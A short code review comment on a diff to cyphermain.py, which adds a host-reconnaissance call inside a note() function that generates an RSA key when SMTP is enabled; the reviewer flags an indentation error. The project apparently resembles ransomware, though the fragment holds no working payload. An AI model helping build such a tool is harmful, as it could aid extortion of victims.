cyphermain.py

```diff
@@ -179,6 +195,7 @@ def note():
 	if SMTP == True:
 		key = RSA.generate(2048)
 		exKey = key.exportKey('PEM')
+                hostinfo = recon()

```

Comment:
Indentation error also you will need to process the dict to an actual array of strings.